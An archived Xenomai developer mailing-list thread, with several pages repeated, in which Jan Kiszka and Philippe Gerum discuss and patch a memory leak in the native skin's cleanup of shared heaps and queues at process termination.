From: Nicolai Josuttis (nicolai.josuttis_at_[hidden]) Date: 2000-01-02 16:05:03 Gabriel Dos Reis wrote: > > Nicolai Josuttis <nicolai.josuttis_at_[hidden]> writes: > > Hi Nico, > > | As I got no feedback so far: > | Did anybody look at it and is anybody interested? > > Or wasn't anybody being on holidays? :-) > Damned, I knew there was something, others do between Christmas an New Year :-) > | However, one question remains: > | - Which name should we take? > | c_array, carray, block? > | Is one of these name used in a library alreay? > > As Greg proposed, why not 'array'? > Hmmm, I am not sure because array might be widely use as identifier already (YES, I know we have namespaces, but still I'd like to avoid conflicts if possible). carray stand for "constant array" but that means something else. How about constant_sized_array? No, just kidding, too long! The more I think about it, the more I like array.
https://lists.boost.org/Archives/boost/2000/01/1512.php
CC-MAIN-2020-05
refinedweb
148
69.18
Preference panel not opening. - etienneabonn last edited by gferreira Every time I try to open my preferences panel I get this in the output window: Traceback (most recent call last): File "lib/doodleDelegate.pyc", line 275, in openPreferences_ File "lib/doodlePreferences.pyc", line 653, in __init__ File "lib/doodlePreferences.pyc", line 1058, in setupMiscFromDefaults AttributeError: 'NoneType' object has no attribute 'fontName' and nothing happens. Did you set a custom template preview font? Or removed "Lucida Grande" from your system? to solved it execute this: from lib.tools.defaults import setDefault setDefault("templateGlyphFontName", None) oke thanks for reporting will check if the font is still installed on your system in the next version good luck
https://forum.robofont.com/topic/151/preference-panel-not-opening
CC-MAIN-2020-16
refinedweb
114
51.14
This is your resource to discuss support topics with your peers, and learn from each other. 02-13-2013 09:28 AM Hi, any starting point how I could encode/generate a qrcode as an image to display in QML? thanks! Solved! Go to Solution. 02-13-2013 04:16 PM 02-13-2013 08:00 PM You can have a look at Zxing. They have developed a QR generator/decoder for Java but they also created a partial C++ port. Maybe it helps you a little. 02-27-2013 08:57 PM Have you solved your problem? This is a easy way to show QrCode. QrCodeView { id: qrCode data: "Your Data Here" preferredWidth: 300 preferredHeight: 300 horizontalAlignment: HorizontalAlignment.Center } You need to import import bb.cascades.multimedia 1.0 import bb.multimedia 1.0 and add the following line to your .pro file: LIBS += -lbbcascadesmultimedia 02-27-2013 09:51 PM 01-24-2014 07:34 AM I'm surprised no-one mentioned there is actually a BarCodeViewer as well as other associated classes for Cascades itself... Does need 10.2 though. 06-10-2014 04:31 AM have you ever done this , java qr code generation
https://supportforums.blackberry.com/t5/Native-Development/Encode-generate-QRCode-barcode/m-p/2750351
CC-MAIN-2016-36
refinedweb
198
60.21
. Allow the autoloader to act as a fallback autoloader. In the case where a team may be widely distributed, or using an undetermined set of namespace prefixes, the autoloader should still be configurable such that it will attempt to match any namespace prefix. It will be noted, however, that this practice is not recommended, as it can lead to unnecessary lookups. Allow toggling error suppression. We feel -- and the greater PHP community does as well -- that error suppression is a bad idea. It's expensive, and it masks very real application problems. So, by default, it should be off. However, if a developer insists that it be on, we allow toggling it on. Allow specifying custom callbacks for autoloading. Some developers don't want to use Zend_Loader::loadClass() for autoloading, but still want to make use of Zend Framework's mechanisms. Zend_Loader_Autoloader allows specyfing an alternate callback for autoloading. Allow manipulation of the SPL autoload callback chain. The purpose of this is to allow specifying additional autoloaders -- for instance, resource loaders for classes that don't have a 1:1 mapping to the filesystem -- to be registered before or after the primary Zend Framework autoloader.
http://framework.zend.com/manual/1.12/en/learning.autoloading.design.html
CC-MAIN-2014-42
refinedweb
195
56.76
On rising tides etc. Thoughts on Twitter’s “growth problem” Disclaimer: I used to work at Twitter but it has been almost a year since I left and I have no inside information into the company’s strategy, product plans or anything else. This post is based solely on my opinions as a long-time user of the product and observer of silicon valley. There has been a lot of talk about “Twitter’s growth problem” — how it is the cause of the stock price falling (although stock is doing great lately), executives leaving, and pretty much everything else one can claim is “wrong” with the company. As well as much theorizing on how to “spur growth” for Twitter. I have a different take: Twitter —the product we know today—will not grow much further. It may gain another 50 million or even 100 million monthly active users (MAU) but it will definitely not grow by an order of magnitude or even get close to 1B active users. And that’s probably OK. Twitter — the broadcast medium of 140 character Tweets — has reached its local maximum. How can we know this? - In the time that Twitter has existed, global smartphone penetration grew from below 1% in 2006 to almost 25% in 2014. In mature markets like US, smartphone penetration is already at 66%! In the history of technology there has never been a rising tide as fast as this one. If the Twitter ship did not lift beyond 250mm MAU when the tide was rising at this unprecedented exponential rate, then it is highly unlikely that Twitter can make its ship lift now that the tide is slowing to linear growth. - Social networking is rapidly moving away from 1:many broadcast mediums like Facebook and Twitter where you send infrequent messages to lots of followers, to 1:few narrowcast platforms where you send tons of messages to a handful of friends. Mary Meeker captured this perfectly in her Internet Trends report (slide below.) To use yet another meteorological analogy, if Twitter could not get further with the wind behind its back, it is highly unlikely to do so now that it’s going against the wind. I don’t think this is cause for alarm. Twitter is part of the fabric of society and isn’t going anywhere, and it has shown incredible creativity in monetizing its current userbase. But also Twitter still has fundamental assets it can leverage towards building or buying (+ reinforcing) completely new types of audiences. A big one is identity. Twitter’s @names are like DNS for entities: people, brands, organizations, parody characters. A disambiguated namespace to identify anyone or anything on the interwebs is powerful. Imagine being able to message anyone on any platform (text, Whatsapp, Snapchat etc) with their Twitter @name, without knowing their phone number or usernames in other apps. Imagine paying anyone with their @name like M-Pesa does with phone numbers. Etc. I’m confident we will see a lot more interesting things from Twitter but they may not look like the Twitter we know today. #onward
https://medium.com/@mitali/on-rising-tides-etc-f6652788ea60?source=tw-3ac9e631c2fc-1403490529503
CC-MAIN-2015-11
refinedweb
516
60.35
Welcome to the Parallax Discussion Forums, sign-up to participate. /* pixyuart fnctn 3a.c This works to return a value, C code used with Pixy - CMUCAM5 Tom Montemarano June 2014, MIT License. This program prints out the value of x for a chosen signature and data for all blocks in a frame Pixy pin 1 (PP1) (rx) -- ABot P0 (tx) -- QS p14 white PP4 (tx) -- Abot P1 (rx) -- QS p13 blue PP2 (+5v )-- Abot (+5v) -- QS (+5v) PP6 (gnd) -- Abot (gnd) -- QS (gnd) Run with terminal. Type sig number (1-7) <enter> This version only prints out the data The order of Pixy words in each block is: 43605 (sync), checksum (sum of next 5 words), signature # (1 - 7), x-position of centroid, y-position, width, height. Each word is sent LSB first 2 sync words in succession mean start of new frame. Now that I got it working I need to: 1. Modify to also use colorcodes */ #include "simpletools.h" // Include simple tools #include "fdserial.h" #define pybaud 86400 // This baud seems maximum, maybe too fast when getpixyx() is used in some pgms // 57600 baud seems safer #define pynumblks 14 // max nmbr blocks make large enough to get sig of interest, but too large gets errors #define blks 16 // make this pynumblks + 2 fdserial *pixy; int abc; int signum = 1; // this is the signature of interest (1 - 7) int pyk; //int pynumblks = 14; //int blks = pynumblks + 2; int pycktot; int pyflg; // pyflg = 1 when first sync word located int pv[blks][7]; int pyxflg =0; int pixyx = -1; int pyflg2 =1; int pycount = 200; // number of tries or return -1 *** calling program sets this just before calling function int rempycount; int getpyx(int z, int cntr) // z is the signature number 1 - 7, cntr is pycount { char c1; // raw LS byte values from pixy int i; int j; // number of pixy words int k; // fdserial * fdserial_open(int rxpin, int txpin, int mode, int baudrate) // in calling program choose one of the 2 statements below. comment out the other one // pixy = fdserial_open(1, 0, 0, pybaud); // For ActivityBot // pixy = fdserial_open(13, 14, 0, pybaud); // for quickstart board pixyx = -1; pyflg2 = 1; pause(50); while(pyflg2) { cntr--; pyflg = 0; fdserial_rxFlush(pixy); c1 = fdserial_rxChar(pixy); if(c1 == 0x55) // 1st { pv[0][0] = fdserial_rxChar(pixy); if(pv[0][0] == 0xAA) // one sync word 2nd { pyflg =1; c1 = fdserial_rxChar(pixy); if(c1== 0x55) // 3rd { pv[0][0] = fdserial_rxChar(pixy); if(pv[0][0] == 0xAA) // 2 sync words = start of frame 4th { pv[0][0] = 0xAA55; pyflg =2; for(i = 1; i < 7; i++) { c1 = fdserial_rxChar(pixy); pv[0][i] = (fdserial_rxChar(pixy) << 8) | c1; } k = 1; for(j = 1; j < pynumblks; j++) // aa { for(i = 0; i < 7; i++) // bb { c1 = fdserial_rxChar(pixy); pv[j][i] = (fdserial_rxChar(pixy) << 8) | c1; if((pv[j][1] != 0xAA55) && (pv[j][2] != 0)) k= j+1; // 2 sync words or empty block } // end bb } // end aa printi(" \n----- new frame -----\n"); for(i=0; i < k; i++) // cc k = num good blocks { pycktot = 0; for(j=2; j<7; j++) pycktot += pv[i][j]; // calc chksum if((pv[i][1] !=0) && pycktot == pv[i][1]) // if cksum is good and chksum<>0 5th { pyk = k; printi(" --- new block --- k = %d i = %d \n", k, i); printi(" checksum good\n"); printi("sync = %d\n", pv[i][0]); printi("chksum = %d\n", pv[i][1]); printi("sig_num = %d\n", pv[i][2]); printi("x = %d\n", pv[i][3]); printi("y = %d\n", pv[i][4]); printi("width = %d\n", pv[i][5]); printi("height = %d\n", pv[i][6]); printi("area = %d\n", pv[i][5]*pv[i][6]); if((pv[i][2] == z) && (pyxflg == 0)) // dd { pyxflg = 1; pixyx = pv[i][3]; pyflg2 =0; printi("pixyx = %d\n",pixyx); } // end dd } // end 5th else printi("*** cksum ng *** = %d\n", pycktot); } // end cc pyxflg = 0; rempycount = cntr; // only if there is need to know value of cntr **** return pixyx; } // end 4th } // end 3rd } // end 2nd } // end 1st if(cntr<0) { pyflg2 =0; rempycount = cntr; // only if there is need to know value of cntr **** return pixyx; } } // end while } // end function int main() // calling program must have the statements marked with **** Those with ^^^ are needed with each call // calling program should call one additional time if result is -1 due to inconsistent pixy { pixy = fdserial_open(1, 0, 0, pybaud); // For ActivityBot **** pause(50); // **** needed after open fdserial_rxFlush(pixy); pause(50); while (1) { int xx = getchar(); // enter sig number signum=xx-48; if((signum>=1) && (signum<=7)) { printi("\n signum = %d xx= %c ", signum, xx); fdserial_rxFlush(pixy); // *** flush before calling abc = getpyx(signum, pycount); // parameters signum, number of tries *** function call printi("signum = %d k = %d pycount = %d abc = %d\n",signum, pyk, rempycount, abc); // pause(1000); } } //pause(1000); fdserial_close(pixy); } imbinary wrote: » I'm working on a simple robot project with the activity board and pixyCMU5. I modified the arduino code to work with this board via SPI. The initial release is here . I run the code in a cog and access the data from the blocks struct. One gotcha I encountered was not having enough light when testing, and not detecting anything so assumed the code was broken :frown:. ... Hopefully this helps someone else get started. imbinary void main() { pixyStart(); // pixy_cog = cog_run(&pixyStart, 160); while(1) { pause(500); printi("running \n"); if(blockCount){ //dprinti(xbee,"pixy: %d\n",blocks[0].x); printi("pixy: count %d x(%d) y(%d)\n",blockCount,blocks[0].x,blocks[0].y); } } } pixyval := SPI.SHIFTIN(DQ, CLK, SPI#MSBPRE, 8) '' read the pixy The function can be modified to return any of the Pixy data (x, y, horizontal size, vertical size). The code I've posted below has the function and a short main() to demonstrate how it works. In the ActivityBot post, I've removed the printing portion of the code since its not needed. I'd like to figure out a way to improve this since there is an issue. Since pixy sends data continuously and the number of blocks per frame depend on the baud as well as the number of objects pixy finds in each signature. The data is sent in signature number order, with the data in each signature group sent in order of size. A new frame is started every 20 ms, even if in the middle of a block (giving a bad checksum). If there are a lot of objects (blocks) of the low numbered signatures, the higher signature ones may never be sent. On the other hand if there are only a few blocks in the field of view, lots of zeros will be sent. The code below is my try. Comments welcome. Tom @imbinary I tried the code but i did not get anything printed out. I retried by running the pixyStart() function in the same cog as main, and it did print "pixy init" and "pixy init finish", but nothing else. I added a statement in the getWord() function to print w. When I ran that code using Run With Terminal, it did printout the Pixy data block. But it would only print one block per frame. For example, I defined 3 colors (signatures 1,2,3). But the program only captures one block (the largest object of the lowest number signature) each frame. If I removed object 1, it would printout data for object 2, etc. The main() function I used is shown below. I have 2 questions. 1. Any idea why I do not get anything printed from main? 2. Do you only get block per frame? Thanks Tom The numbers looked correct, but even with the clock delay value = 1, (I tried different settings) I was only able to get one block per frame. I also had to increase the PST baud to 19200 in order to print the entire block. I'm not sure if I am doing something wrong or if that is the limitation of the prop or of pixy. Pixy is supposed to send data at 1Mbit/second with 20ms between Frames. tom By setting the delay value to 15 (=clock delay of 1u sec) I was able to get more than 6 blocks per frame. (6 objects were detected and the remaining values were zeros until the next frame started indicating that it could have handled more blocks.) I tried the same thing with the C program, but was only able to get 2 blocks before the start of a new frame. That could be due to the clock setting, but I don't see anyway to change it.?. Tom Using that code I get over 14 blocks of data per frame, which should be sufficient for using ColorCodes or a large number of color signatures. It's at the end of this thread: You still have to write code to transform the raw data as you want. Tom Inspired by Tom I took his program using Pixy with the analog output signal as a starting point. I expanded it / added things: -2nd cog is used to do PING -I use a PID algorithm to get to the object (for the time being I disabled the Integral part since that can get out of hand easily and is overkill to use on a relative simple task as this one) The code is here: Pixy_only.c Enjoy! Next step for me is do sort of the same but using the UART mode and the block data coming out of pixy I'm wondering if anyone is still following this thread since there hasn't been any activity for quite some time? Has this information moved to another Parallax forum thread? There are a few Propeller threads on the Pixy Software Forum, but not too much. I've been doing some work with the Pixy, and yes, in UART mode the data stream is filled with $00 between Image Frames. Since the frame rate is 50Hz (every 20mS), the faster the baud rate, the more $00 bytes will be sent between frames because the actual Image Frame data takes less of the 20mS window. If you look in the Pixy Software Forum and search for "UART frame" you will find a special version of Pixy firmware that does not do this. It will just send the data for the Image Frame and stop. However there are a couple data changes: Every Image Frame in the special version starts with $0000, then the sync bytes, then the data, etc. If there are no objects in the frame it only sends the $0000. It's not obvious to me what will happen to this version if a new "standard" version of firmware is released. It would probably be a better idea for me to move to the I2C or SPI interface since as far as I know those protocols don't have this issue. Anyway, if you're out there and still interested in Pixy on the Propeller, either let me know where this topic has moved to, or please start posting here again, and I'll join in. Robert Dave Prospero: Robot Farmer After I wrote post 37 above, I got involved writing an SPI library using the C and PASM code for a few of the SPI devices I have. Then I got sidetracked. I also saw that the CMU pixy folks have changed the SPI protocol that pixy uses. Previously, pixy just continuously sent data in 8 bit bytes. The new version of the Pixy firmware requires the controlling Micro to send 16 bits and the pixy responds with 16 bits. (At least that's the way I read their documentation.) That has an advantage in that when it sends it sends a complete MSB first data word. So there is no longer the need to test the received byte to determine if it is the 1st or 2nd byte of a word. But it will slow down the data rates. My SPI library should be able to handle that, but the original pixy SPI code I wrote won't work on the new firmware. I haven't updated my pixy firmware yet since there are a lot of questions regarding bugs in the software. I'm not sure if the bugs are just in the arduino libraries or if there are issues in the firmware also. It also seems like there are some unofficial versions of firmware (like the UART code you mentioned), so I'm hesitant to write my SPI code for version "???". I'm also not sure if the slow down will significantly reduce the number of blocks of data per frame. One other advantage of the new SPI protocol when used with colorcodes and colorcode mode 2 (colorcodes only) is that all you would have to do is get a 16bit read and look for $aa55, and that would mean the start of a new frame since colorcode blocks start with $aa56. That way I could do away with the code that looks for $aa followed by $55 to determine the start of a word and with the code that looks for 2 instances of $aa55 for the start of a new frame. Tom Glad to hear there is still interest out there. I'll keep you posted on my progress. Thanks!! Robert
http://forums.parallax.com/discussion/comment/1450432
CC-MAIN-2018-47
refinedweb
2,219
72.5
(). Note Before the autocomplete() method was introduced, the search method also did partial matching. This behaviour is will be deprecated and you should either switch to the new autocomplete() method or pass partial_match=False into the search method to opt-in to the new behaviour. The partial matching in search() will be completely removed in a future release. Autocomplete searches¶ Wagtail provides a separate method which performs partial matching on specific autocomplete fields. This is useful for suggesting pages to the user in real-time as they type their query. >>> EventPage.objects.live().autocomplete("Eve") [<EventPage: Event 1>, <EventPage: Event 2>] Tip This method should only be used for real-time autocomplete and actual search requests should always use the search() method.>] Phrase searching¶ Phrase searching is used for finding whole sentence or phrase rather than individual terms. The terms must appear together and in the same order. For example: >>> from wagtail.search.query import Phrase >>> Page.objects.search(Phrase("Hello world")) [<Page: Hello World>] >>> Page.objects.search(Phrase("World hello")) [<Page: World Hello day>] If you are looking to implement phrase queries using the double-quote syntax, see Query string parsing. Complex search queries¶ Through the use of search query classes, Wagtail also supports building search queries as Python objects which can be wrapped by and combined with other search queries. The following classes are available: PlainText(query_string, operator=None, boost=1.0) This class wraps a string of separate terms. This is the same as searching without query classes. It takes a query string, operator and boost. For example: >>> from wagtail.search.query import PlainText >>> Page.objects.search(PlainText("Hello world")) # Multiple plain text queries can be combined. This example will match both "hello world" and "Hello earth" >>> Page.objects.search(PlainText("Hello") & (PlainText("world") | PlainText("earth"))) Phrase(query_string) This class wraps a string containing a phrase. See previous section for how this works. For example: # This example will match both the phrases "hello world" and "Hello earth" >>> Page.objects.search(Phrase("Hello world") | Phrase("Hello earth")) Boost(query, boost) This class boosts the score of another query. For example: >>> from wagtail.search.query import PlainText, Boost # This example will match both the phrases "hello world" and "Hello earth" but matches for "hello world" will be ranked higher >>> Page.objects.search(Boost(Phrase("Hello world"), 10.0) | Phrase("Hello earth")) Note that this isn’t supported by the PostgreSQL or database search backends. Query string parsing¶ The previous sections show how to construct a phrase search query manually, but a lot of search engines (Wagtail admin included, try it!) support writing phrase queries by wrapping the phrase with double-quotes. In addition to phrases, you might also want to allow users to add filters into the query using the colon syntax ( hello world published:yes). These two features can be implemented using the parse_query_string utility function. This function takes a query string that a user typed and returns a query object and dictionary of filters: For example: >>> from wagtail.search.utils import parse_query_string >>> filters, query = parse_query_string('my query string "this is a phrase" this-is-a:filter', operator='and') >>> filters { 'this-is-a': 'filter', } >>> query And([ PlainText("my query string", operator='and'), Phrase("this is a phrase"), ]) Here’s an example of how this function can be used in a search view: from wagtail.search.utils import parse_query_string def search(request): query_string = request.GET['query'] # Parse query filters, query = parse_query_string(query_string, operator='and') # Published filter # An example filter that accepts either `published:yes` or `published:no` and filters the pages accordingly published_filter = filters.get('published') published_filter = published_filter and published_filter.lower() if published_filter in ['yes', 'true']: pages = pages.filter(live=True) elif published_filter in ['no', 'false']: pages = pages.filter(live=False) # Search pages = pages.search(query) return render(request, 'search_results.html', {'pages': pages})), ("Hall.
https://docs.wagtail.org/en/v2.15.1/topics/search/searching.html
CC-MAIN-2022-21
refinedweb
635
58.58
Last year, I wrote two articles here on Smashing Magazine about using Flutter on web and desktop platforms. The first article was a general introduction to web and desktop development, and focused on building responsive UI; the second article was about the challenges you might face when trying to develop a Flutter app that runs on multiple platforms. Back then, Flutter support for non-mobile platforms wasn’t considered stable and production-ready by the Flutter team, but things have changed now. Flutter 2 Is Here On the 3rd of March, Google held the Flutter Engage event, where Fluter 2.0 was launched. This release is really a proper 2.0 release, with many changes promising to make Flutter really ready for going beyond mobile app development. The change that is central to understanding why Flutter 2.0 matters is that web development is now officially part of the stable channel and desktop support will follow soon on the stable channel as well. In fact, it is currently enabled in release candidate-like form as an early release beta snapshot in the stable channel. In the announcement, Google didn’t just give a hint of what the future of Flutter will be like. There were also actual examples of how large companies are already working on Flutter apps to replace their existing apps with ones that perform better and allow developers to be more productive. E.g. the world’s biggest car manufacturer, Toyota, will now be building the infotainment system on their cars using Flutter. Another interesting announcement — this one showing how fast Flutter is improving as a cross-platform SDK — is Canonical’s announcement that, in addition to developing their new Ubuntu installer using Flutter, they will also be using Flutter as their default option to build desktop apps. They also released a Flutter version of Ubuntu’s Yaru theme, which we will use later in the article to build a Flutter desktop app that looks perfectly at home in the Ubuntu desktop, also using some more of the new Flutter features. You can take a look at Google’s Flutter 2 announcement to get a more complete picture. Let’s look at some of the technical changes to Flutter which got onto the stable channel with version 2.0 and build a very simple example desktop app with Flutter before we draw some conclusions on what specific project types we could and couldn’t use Flutter for as of now. General Usability Changes For Bigger Devices According to the announcement, many changes have been made to Flutter to provide better support for devices that aren’t mobile devices. For example, an obvious example of something that was needed for web and desktop apps and until now had to be done using third-party packages or by implementing it yourself is a scrollbar. Now there is a built-in Scrollbar which can fit right into your app, looking exactly how a scrollbar should look in the specific platform: with or without a track, with the possibility of scrolling by clicking on the track, for example, which is huge if you want your users to feel right at home from the start when using your Flutter app. You can also theme it and customize it. It also looks like at some point Flutter will automatically show suitable scrollbars when the content of the app is scrollable. Meanwhile, you can just wrap any scrollable view with the scrollbar widget of your choice and create a ScrollController to add as the controller for both the scrollbar and the scrollable widget (in case you’ve never used a ScrollController, you use exactly like a TextEditingController for a TextField). You can see an example of the use of a regular Material scrollbar a bit further down this article in the desktop app example. Flutter Web Changes Flutter for the web was already in a quite usable form, but there were performance and usability issues which meant it never felt as polished as mobile Flutter. With the release of Flutter 2.0, there have been many improvements to it, especially when it comes to performance. The compilation target, previously very experimental and tricky to use to render your app (with WebAssembly and Skia) is now called CanvasKit. It’s been refined to offer a consistent and performant experience when going from running a Flutter app natively on mobile devices to running it in a browser. Now, by default, your app will render using CanvasKit for desktop web users and with the default HTML renderer (which has had improvements as well, but is not as good as CanvasKit) for mobile web users. If you’ve tried to use Flutter to build web apps, you might have noticed it wasn’t particularly intuitive to have something as simple as a hyperlink. Now at least, you can create hyperlinks a bit more like you would when using HTML, using the Link class. This is actually not an addition to Flutter itself, but a recent addition to Google’s url_launcher package. You can find a complete description and examples of usage of the Link class in the official API reference. Text selection was improved as now the pivot point corresponds to where the user started selecting text and not the left edge of the SelectableText in question. Also, now Copy/Cut/Paste options exist and work properly. Nevertheless, text selection still isn’t top-notch as it’s not possible to select text across different SelectableText widgets and selectable text still isn’t default, but we will talk about this as well as other outstanding Flutter web drawbacks (lack of SEO support, first and foremost) in the conclusion to this article. Flutter Desktop Changes When I wrote about web and desktop development with Flutter last year, I focused mostly on building web apps with Flutter, given that desktop development was still considered very experimental (not even on the beta channel). Now though, Flutter desktop support is soon to follow web support and will be going stable. Performance and stability have been improved quite a lot, and the improvements in general usability for bigger devices operated with a mouse and keyboard that benefit web apps so much also mean that Flutter desktop apps are now more usable. There is still a lack of tooling for desktop apps and there are still many quite severe outstanding bugs, so don’t try to use it for your next desktop app project meant for public distribution. Example Desktop App Built With Flutter Flutter desktop support is now quite stable and usable though, and it will surely get better in the future just as much as Flutter in its entirety has gotten better until now, so let’s give it a try to see it in action! You can download the entire code example on a GitHub repo. The app we will build is the following very simple app. We have a sidebar navigation along with some content items for each of the navigation sections. The first thing to do is figure out your dependencies. First of all, you must have Flutter desktop development enabled, using the command flutter config --enable-${OS_NAME}-desktop where you’d replace ${OS_NAME} with your desktop OS of choice, either windows, linux or macos. For this example, I’ll use Linux given that we’re going to use the Ubuntu theme. There are also other dependencies needed to build native apps for each platform, for example on Windows you need Visual Studio 2019, on macOS you need Xcode and CocoaPods and you can find an up-to-date list of Linux dependencies on Flutter’s official website. Then create a Flutter project, running: flutter create flutter_ubuntu_desktop_example Then, we must get the theme itself (our app’s only dependency) by adding yaru to the your app’s dependencies in pubspec.yaml (in the root of the source tree): dependencies: yaru: ^0.0.0-dev.8 flutter: sdk: flutter Then, let’s move over to lib/main.dart, where our app’s code resides. First, we import the stuff we need. In this case, we’re just going to import the regular Flutter Material Design library and the Yaru theme (we are only going to use the light theme for this example so we are going to only show that one object in the Yaru package): import 'package:flutter/material.dart'; import 'package:yaru/yaru.dart' show yaruLightTheme; Instead of having a separate app class, we are going to call the MaterialApp contructors directly in main when calling runApp, so that’s where we set the app’s theme, which is going to be the Yaru theme, more specifically the light theme called yaruLightTheme: void main() => runApp(MaterialApp( theme: yaruLightTheme, home: HomePage(), )); The HomePage is going to be a StatefulWidget, holding the data we are going to show given that it’s immutable (remember, widgets are always immutable, mutability is handled in the State of a StatefulWidget): class HomePage extends StatefulWidget { final dataToShow = { "First example data": [ "First string in first list item", "Second in first", "Example", "One" ], "Second example": [ "This is another example", "Check", "It", "Out", "Here's other data" ], "Third example": [ "Flutter is", "really", "awesome", "and", "it", "now", "works", "everywhere,", "this", "is", "incredible", "and", "everyone", "should", "know", "about", "it", "because", "someone", "must", "be", "missing", "out", "on", "a lot" ] }.entries.toList(); @override createState() => HomePageState(); } The HomePageState is where we define app UI and behaviour. First of all, let’s look at the tree of widgets we want to build (list and grid items and spacing widgets excluded): We are going to restrict the Column on the left (the one showing the controls for the widgets to show on the right side of the app) to a certain width (400 pixels for example) using a Container, whereas the GridView on the right should be Expanded to fill the view. On the left side of the Row (within the Column), the ListView should expand to fill the vertical space below the Row of buttons at the top. Within the Row at the top, we also need to expand the TextButton (the reset button) to fill the space to the right of the left and right chevron IconButtons. The resulting HomePageState that does all of that, along with the necessary logic to show the right stuff on the right depending on what the user selects on the left, is the following: class HomePageState extends State<HomePage> { int selected = 0; ScrollController _gridScrollController = ScrollController(); incrementSelected() { if (selected != widget.dataToShow.length - 1) { setState(() { selected++; }); } } decrementSelected() { if (selected != 0) { setState(() { selected--; }); } } @override Widget build(BuildContext context) { return Scaffold( body: Row( children: [( child: ListView.builder( itemCount: widget.dataToShow.length, itemBuilder: (_, i) => ListTile( title: Text(widget.dataToShow[i].key), leading: i == selected ? Icon(Icons.check) : Icon(Icons.not_interested), onTap: () { setState(() { selected = i; }); }, ), ), ), ], )), Expanded( child: Scrollbar( isAlwaysShown: true, controller: _gridScrollController, child: GridView.builder( controller: _gridScrollController, itemCount: widget.dataToShow[selected].value.length, gridDelegate: SliverGridDelegateWithMaxCrossAxisExtent( maxCrossAxisExtent: 200.0), itemBuilder: (_, i) => Container( width: 200.0, height: 200.0, child: Padding( padding: const EdgeInsets.all(8.0), child: Card( child: Center( child: Text(widget.dataToShow[selected].value[i])), ), ), )), ), ), ], ), ); } } and we’re done! Then you build your app with flutter build ${OS_NAME} where ${OS_NAME} is the name of your OS, the same you used earlier to enable Flutter desktop development using flutter config. The compiled binary to run your app will be build/linux/x64/release/bundle/flutter_ubuntu_desktop_example on Linux and buildwindowsrunnerReleaseflutter_ubuntu_desktop_example.exe on Windows, you can run that and you’ll get the app that I showed you at the start of this section. On macOS, you need to open macos/Runner.xcworkspace in Xcode and then use Xcode to build and run your app. Other Flutter Changes There have also been a few changes that also affect mobile development with Flutter, and here is just a brief selection of some of them. A feature that so many of us, Flutter developers, wanted is better support for Admob ads, and it’s now finally included in the official google_mobile_ads package. Another one is autocomplete; there is an Autocomplete material widget for it, as well as a more customizable RawAutocomplete widget. The addition of the Link that we discussed in the section about web development actually applies to all platforms, even though its effects will be felt most by those working on Flutter web projects. Recent Dart Language Changes It is important to be aware of the changes that were made to the Dart language that affect Flutter app development. In particular, Dart 2.12 brought C language interoperability support (described in detail and with instructions for different platforms on the official Flutter website); also, sound null-safety was added to the stable Dart release channel. null-safety The biggest change that was made to Dart is the introduction of sound null-safety that it’s getting more and more support from third-party packages as well as the Google-developed libraries and packages. Null safety brings compiler optimizations and reduces the chance of runtime errors so, even though right now it’s optional to support it, it is important you start at least understanding how to make your app null-safe. At the moment though, that may not be an option for you as not all Pub packages are fully null-safe and that means that if you need one of those packages for your app you won’t be able to take advantage of the benefits on null-safety. Making Your App null-safe If you’ve ever worked with Kotlin, Dart’s approach to null safety will be somewhat familiar to you. Take a look at Dart’s official guide on it for a more complete guide to Dart’s null-safety. All of the types you’re familiar with ( String, int, Object, List, your own classes, etc.) are now non-nullable: their value can never be null. This means that a function that has a non-nullable return type must always return a value, or else you’ll get a compilation error and you always have to initialize non-nullable variables, unless it’s a local variable that gets assigned a value before it’s ever used. If you want a variable to be nullable you need to add a question mark to the end of the type name, e.g. when declaring an integer like this: int? a = 1 At any point, you can set it to null and the compiler won’t cry about it. Now, what if you have a nullable value and use it for something that requires a non-nullable value? To do that, you can simply check it isn’t null: void function(int? a) { if(a != null) { // a is an int here } } If you know with 100% certainty that a variable exists and isn’t null you can just use the ! operator, like this: String unSafeCode(String? s) => s!; Drawing Conclusions: What Can We Do With Flutter 2? As Flutter keeps evolving, there are more and more things we can do with it, but it’s still not reasonable to say that Flutter can be used for any app development project of any kind. On the mobile side, it’s unlikely you’re going to run into something that Flutter isn’t great at because it’s been supported since the start and it’s been polished. Most things you’ll ever need are already there. On the other hand, web and desktop aren’t quite there yet. Desktop is still a bit buggy and Windows apps (which are an important part of desktop development) still require a lot of work before they look good. The situation is better on Linux and macOS only to an extent. The web is in a much better place than desktop. You can build decent web apps, but you’re still mostly limited to single-page applications and Progressive Web Apps. We still most certainly don’t want to use it for content-centric apps where indexability and SEO are needed. Content-centric apps probably will not be that great because text selection still isn’t top-notch, as we’ve seen in the section about the current state of Flutter for the web. If you need the web version of your Flutter app, though, Flutter for the web will probably be just fine, especially as there are a huge amount of web-compatible packages around already and the list is always growing. Additional Resources (vf, il)
https://www.fvwebsite.design/fraser-valley-website-design/whats-new-in-flutter-2-smashing-magazine/
CC-MAIN-2021-17
refinedweb
2,751
57.3
On Sun, 2009-10-18 at 19:56 +0200, Jan Kiszka wrote: > Philippe Gerum wrote: > > On Sun, 2009-10-18 at 14:54 +0200, Jan Kiszka wrote: > >> Philippe Gerum wrote: > >>> On Fri, 2009-10-16 at 19:08 +0200, Jan Kiszka wrote: > >>>> Hi, > >>>> > >>>> our automatic object cleanup on process termination is "slightly" broken > >>>> for the native skin. The inline and macro magic behind > >>>> __native_*_flush_rq() blindly calls rt_*_delete(), but that's not > >>>> correct for mutexes (we can leak memory and/or corrupt the system heap), > >>>> queues and heaps (we may leak shared heaps). > >>> Please elaborate regarding both queues and heaps (scenario). > >> Master creates heap, slave binds to it, master wants to terminate (or is > >> killed, doesn't matter), heap cannot be released as the slave is still > >> bound to it, slave terminates but heap object is still reserved on the > >> main heap => memory leak (just confirmed with a test case). > > > > This fixes it: > > > > diff --git a/ksrc/skins/native/heap.c b/ksrc/skins/native/heap.c > > index 0a24735..0fcb3c2 100644 > > --- a/ksrc/skins/native/heap.c > > +++ b/ksrc/skins/native/heap.c > > @@ -340,6 +340,11 @@ static void __heap_post_release(struct xnheap *h) > > xnpod_schedule(); > > > > + xeno_mark_deleted(heap); > Actually, we need more than this: diff --git a/ksrc/skins/native/heap.c b/ksrc/skins/native/heap.c index 0a24735..5d43fa7 100644 --- a/ksrc/skins/native/heap.c +++ b/ksrc/skins/native/heap.c @@ -323,6 +323,7 @@ int rt_heap_create(RT_HEAP *heap, const char *name, size_t heapsize, int mode) static void __heap_post_release(struct xnheap *h) { RT_HEAP *heap = container_of(h, RT_HEAP, heap_base); + int resched; spl_t s; xnlock_get_irqsave(&nklock, s); @@ -332,14 +333,24 @@ static void __heap_post_release(struct 